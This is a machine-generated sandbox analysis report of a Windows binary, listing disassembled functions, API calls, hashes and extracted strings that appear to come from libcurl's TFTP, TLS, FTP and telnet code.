                                        • Opcode ID: af7e3cfd91c589766b4bf23870ed22cbabb17d4767621ce4a6e6a37c6c304c6a
                                        • Instruction ID: 42208477ee7909fc51933c1cbc0d8e400f6a181231160f1e19fc8186be2cb73b
                                        • Opcode Fuzzy Hash: af7e3cfd91c589766b4bf23870ed22cbabb17d4767621ce4a6e6a37c6c304c6a
                                        • Instruction Fuzzy Hash: 48D1B631A042AC8FDB358B249C443F9BBF2AF55350F1880EAD589A3691CFB58EC5DB51
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5157
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E516E
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,000E1751,?,00000000,?,?,?,000C8BF9), ref: 000E6D39
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,000C8BF9), ref: 000E6D52
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000C8BF9), ref: 000E6D69
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C8BF9), ref: 000E6D80
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6D97
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DAE
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DC5
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DDC
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DF3
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E0A
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E21
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E38
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E4F
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E66
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E51A4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E51C2
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5219
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5237
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5255
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5273
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E52DF
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E52FD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E531B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5339
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5356
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5370
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E53B9
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E542A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5449
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5466
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E5483
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E54AD
                                          • Part of subcall function 000DE574: getsockname.WS2_32(?,?,?), ref: 000DE5C6
                                          • Part of subcall function 000DE574: WSAGetLastError.WS2_32(?,?,?), ref: 000DE5D0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$ErrorLastgetsockname
                                        • String ID:
                                        • API String ID: 3375700865-0
                                        • Opcode ID: 3f3fd7234440f28b28f3aaefe9b511ddd0f6601f038385443ba61321c1fcb3f1
                                        • Instruction ID: 4112db803b335a3052eae0e2ab7c42be1abbd3beb2aca7cf2eebf3d9dd614e7e
                                        • Opcode Fuzzy Hash: 3f3fd7234440f28b28f3aaefe9b511ddd0f6601f038385443ba61321c1fcb3f1
                                        • Instruction Fuzzy Hash: 19B11A31A14615DFDB099F24E8847DCBBB2FF48311F14817AEC599B262CBB42851CFA5
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 000E1F12
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1F31
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1F4E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1F6B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1F88
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1FA5
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,000E1751,?,00000000,?,?,?,000C8BF9), ref: 000E6D39
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,000C8BF9), ref: 000E6D52
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000C8BF9), ref: 000E6D69
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C8BF9), ref: 000E6D80
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6D97
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DAE
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DC5
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DDC
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DF3
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E0A
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E21
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E38
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E4F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1FCD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1FEA
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2007
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2024
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2041
                                          • Part of subcall function 000DD126: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DD13A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2066
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E207D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2094
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E20AB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E20C5
                                          • Part of subcall function 000E1DD7: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1DFA
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2102
                                          • Part of subcall function 000E6D23: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E66
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E212A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2147
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E215F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 72b9ee8ede3b102992a3d65b821915cfa04537d45707e8e36664932b679a9936
                                        • Instruction ID: 464ec52417da69d378d942bbf5bc3b2fe02fa565ec2c7f474a728c2045693c79
                                        • Opcode Fuzzy Hash: 72b9ee8ede3b102992a3d65b821915cfa04537d45707e8e36664932b679a9936
                                        • Instruction Fuzzy Hash: 7F61C531A14A26EFCB0D5F34ED4859CFBA6FF48351F10812FE46693662CBB428618F91
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F7B0C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %I64d$%s%c%s%c$TFTP buffer too small for options$TFTP file name too long$blksize$netascii$octet$tftp_send_first: internal error$timeout$tsize
                                        • API String ID: 1294909896-119092532
                                        • Opcode ID: c2ad9a5ec0e28bad571daf6930de87f45ce72b66990e819a3e5ab855d715d267
                                        • Instruction ID: 2f6a482208f73fc93d0575d22de5122b334a92bf01a0884ef46bf83014ef60d1
                                        • Opcode Fuzzy Hash: c2ad9a5ec0e28bad571daf6930de87f45ce72b66990e819a3e5ab855d715d267
                                        • Instruction Fuzzy Hash: E9B1E131A083099FDB29CF68CC85BFAB7B5AF45300F0081A9E20D97792DB70AD45DB91
                                        APIs
                                          • Part of subcall function 000E720A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,000E1751,?,00000000,?,?,?,000C8BF9), ref: 000E724B
                                          • Part of subcall function 000E720A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,000C8BF9), ref: 000E7261
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00105531
                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 00105587
                                        Strings
                                        • ALPN: server accepted %.*s, xrefs: 00105335
                                        • schannel: failed to setup stream orientation, xrefs: 001052CB
                                        • http, xrefs: 00105352
                                        • schannel: failed to setup replay detection, xrefs: 00105289
                                        • schannel: failed to setup confidentiality, xrefs: 0010529D
                                        • schannel: failed to setup memory allocation, xrefs: 001052B4
                                        • schannel: failed to retrieve remote cert context, xrefs: 001055B3
                                        • schannel: failed to store credential handle, xrefs: 00105490
                                        • schannel: failed to retrieve ALPN result, xrefs: 00105316
                                        • ALPN: server did not agree on a protocol. Uses default., xrefs: 00105377
                                        • schannel: failed to setup sequence detection, xrefs: 00105275
                                        • /1.1, xrefs: 0010535B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$CertCertificateContextFreecalloc
                                        • String ID: /1.1$ALPN: server accepted %.*s$ALPN: server did not agree on a protocol. Uses default.$http$schannel: failed to retrieve ALPN result$schannel: failed to retrieve remote cert context$schannel: failed to setup confidentiality$schannel: failed to setup memory allocation$schannel: failed to setup replay detection$schannel: failed to setup sequence detection$schannel: failed to setup stream orientation$schannel: failed to store credential handle
                                        • API String ID: 219865100-3105508259
                                        • Opcode ID: 4508634f45fdfc178c8e46457137b574f81c16d130184a519581839f3759e008
                                        • Instruction ID: 354bcc3a3afe4a0b56695c13911973843bbe934d6a652662d15b24c00bb5d998
                                        • Opcode Fuzzy Hash: 4508634f45fdfc178c8e46457137b574f81c16d130184a519581839f3759e008
                                        • Instruction Fuzzy Hash: 0FB1C631A04614DFDF299B14DC85BEAB7B6BF49310F1441DAE488AB2C2DBB49D81CF91
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB20
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB42
                                        • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB9C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010D01D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010D033
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$callocmallocrealloc
                                        • String ID: $ $ $ $ $ $.$.$:
                                        • API String ID: 4199894680-3908554926
                                        • Opcode ID: b4d77624785fe726511da31c3a39d96aba8d277841787b272e0ab384c12c3f26
                                        • Instruction ID: 6e30d4c4fa8d118ff24cde85cde3d85a9fdef9112b48b8e6b972400afa02b711
                                        • Opcode Fuzzy Hash: b4d77624785fe726511da31c3a39d96aba8d277841787b272e0ab384c12c3f26
                                        • Instruction Fuzzy Hash: 5471AC31600B129FD728DF69E648725BBE2FF44320F19821AE485C7AD1D7B5F881CB92
                                        Strings
                                        • GSSAPI handshake failure (empty security message), xrefs: 00110193
                                        • GSSAPI handshake failure (invalid security layer), xrefs: 0010FF18
                                        • GSSAPI handshake failure (invalid security data), xrefs: 0010FED3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
                                        • API String ID: 0-3320144510
                                        • Opcode ID: 3bf217a249cb1c1deaf32803e64bb8e3856a712cca5b7265dbf95dbc086092de
                                        • Instruction ID: 8c538917e252f5bc18e3a849110cbd80b31abf37eefcf28ab9c11f5d0958b75f
                                        • Opcode Fuzzy Hash: 3bf217a249cb1c1deaf32803e64bb8e3856a712cca5b7265dbf95dbc086092de
                                        • Instruction Fuzzy Hash: 23C15B71E00219DFCB19CFA8EC4499DBBF5FF48310F14802AE845E7651DBB4A982CB55
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000EEEE5
                                        Strings
                                        • Couldn't parse CURLOPT_RESOLVE removal entry '%s', xrefs: 000EEDAD
                                        • RESOLVE %s:%d is wildcard, enabling wildcard checks, xrefs: 000EF0AA
                                        • Added %s:%d:%s to DNS cache%s, xrefs: 000EF07D
                                        • *, xrefs: 000EF08B
                                        • Resolve address '%s' found illegal, xrefs: 000EF105
                                        • %255[^:]:%d, xrefs: 000EED98
                                        • Couldn't parse CURLOPT_RESOLVE entry '%s', xrefs: 000EF121
                                        • +, xrefs: 000EF055
                                        • (non-permanent), xrefs: 000EF05C
                                        • RESOLVE %s:%d is - old addresses discarded, xrefs: 000EEFEE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchr
                                        • String ID: (non-permanent)$%255[^:]:%d$*$+$Added %s:%d:%s to DNS cache%s$Couldn't parse CURLOPT_RESOLVE entry '%s'$Couldn't parse CURLOPT_RESOLVE removal entry '%s'$RESOLVE %s:%d is - old addresses discarded$RESOLVE %s:%d is wildcard, enabling wildcard checks$Resolve address '%s' found illegal
                                        • API String ID: 601868998-1491845622
                                        • Opcode ID: c17a9d89a7ea4fa60088d3de526c9893537200820245ea1cfed98b487129b478
                                        • Instruction ID: 8c1df70f8286d233f485eab5f9e00bd7095af747970aa6e9f4b60be7dde2fd01
                                        • Opcode Fuzzy Hash: c17a9d89a7ea4fa60088d3de526c9893537200820245ea1cfed98b487129b478
                                        • Instruction Fuzzy Hash: 4EB11331A0469A9FDB359B25DC85BFEB7B9AF84304F1401EAE04973282EB715E85CF50
                                        APIs
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CF866
                                        • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000CF87A
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CF886
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CF9A0
                                        • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000CF9AF
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CF9BB
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CFA09
                                        • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000CFA18
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CFA24
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CFA39
                                        • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000CFA48
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CFA54
                                          • Part of subcall function 000C3857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 000C3872
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _errno$strtoul$__stdio_common_vsscanf
                                        • String ID: %c-%c%c
                                        • API String ID: 3842623485-1458410868
                                        • Opcode ID: cf9710ffbbd19c9e3b875c4c3e2070655cadf0dadadcc71666b8ac18bc75caee
                                        • Instruction ID: 43dbd1d61b62a495e849de4a598d10fd5339896daf65399f101dda476ff103b7
                                        • Opcode Fuzzy Hash: cf9710ffbbd19c9e3b875c4c3e2070655cadf0dadadcc71666b8ac18bc75caee
                                        • Instruction Fuzzy Hash: 57B18AB5A002069FDB15CF68C890BBDBBF6AF89344F24806ED845AB252DB319D45CB52
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000D5A87), ref: 000E9806
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000D5A87), ref: 000E983D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000D5A87), ref: 000E985F
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000E986B
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00125674,00000000,00000002,?,000D5A87), ref: 000E9884
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(../,00000000,00000003), ref: 000E9899
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E99D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$strncmp$___from_strstr_to_strchrmalloc
                                        • String ID: ../$/..$/../$/./
                                        • API String ID: 11556461-456519384
                                        • Opcode ID: 4f323e1bca2380074005849e646fcffa92d67313ddf29dbf4985c2b508ae1065
                                        • Instruction ID: 65dd2790bb96b47023f4073c71de96ec4749e930313749677b71aa520510226a
                                        • Opcode Fuzzy Hash: 4f323e1bca2380074005849e646fcffa92d67313ddf29dbf4985c2b508ae1065
                                        • Instruction Fuzzy Hash: 50515B21A081D2AFDB351B2E6C54779FFE6DF97350F28406EE4C1B7253DAA14C428751
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FD359
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FD36E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FD3C0
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FD405
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FD58F
                                        Strings
                                        • server did not report OK, got %d, xrefs: 000FD5FB
                                        • Failure sending ABOR command: %s, xrefs: 000FD469
                                        • ABOR, xrefs: 000FD445
                                        • control connection looks dead, xrefs: 000FD553
                                        • partial download completed, closing connection, xrefs: 000FD5BA
                                        • Uploaded unaligned file size (%I64d out of %I64d bytes), xrefs: 000FD696
                                        • No data was received, xrefs: 000FD709
                                        • Remembering we are in dir "%s", xrefs: 000FD3D0
                                        • Exceeded storage allocation, xrefs: 000FD60E
                                        • Received only partial file: %I64d bytes, xrefs: 000FD71F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received$Received only partial file: %I64d bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%I64d out of %I64d bytes)$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
                                        • API String ID: 1294909896-265991785
                                        • Opcode ID: ef7bbf5dd6a2c51dd1bab30b35c059b6cb77ea1e4831db858c574b494df5a015
                                        • Instruction ID: 855daa685af7535c6ff859bb2dd5279bb46979848672b2698a4d697040728afc
                                        • Opcode Fuzzy Hash: ef7bbf5dd6a2c51dd1bab30b35c059b6cb77ea1e4831db858c574b494df5a015
                                        • Instruction Fuzzy Hash: 3FF159305087499FDB69DF34C4887BA7BE3BB51314F04460FEA9886A82D774E844FB92
                                        APIs
                                          • Part of subcall function 000D0DCE: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D0E08
                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,0000001F), ref: 000FEF55
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FF0E0
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FF0F5
                                          • Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C3167), ref: 000D0E2C
                                          • Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D0E41
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$strncpy
                                        • String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$1$BINARY$NEW_ENV$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
                                        • API String ID: 526250031-1116758244
                                        • Opcode ID: 2d57e14f9558c3d7498007267b831d1dd0137dda2fd60c75602f2718a08417ee
                                        • Instruction ID: 76eca33857f975b41d397f39137e704c7a5b358923e0b42c5be9a3d31a60e158
                                        • Opcode Fuzzy Hash: 2d57e14f9558c3d7498007267b831d1dd0137dda2fd60c75602f2718a08417ee
                                        • Instruction Fuzzy Hash: 12718F71904219EBDF20DF14DC81BEA77B9BF44300F1480B6E9499B646DFB09A98DF61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
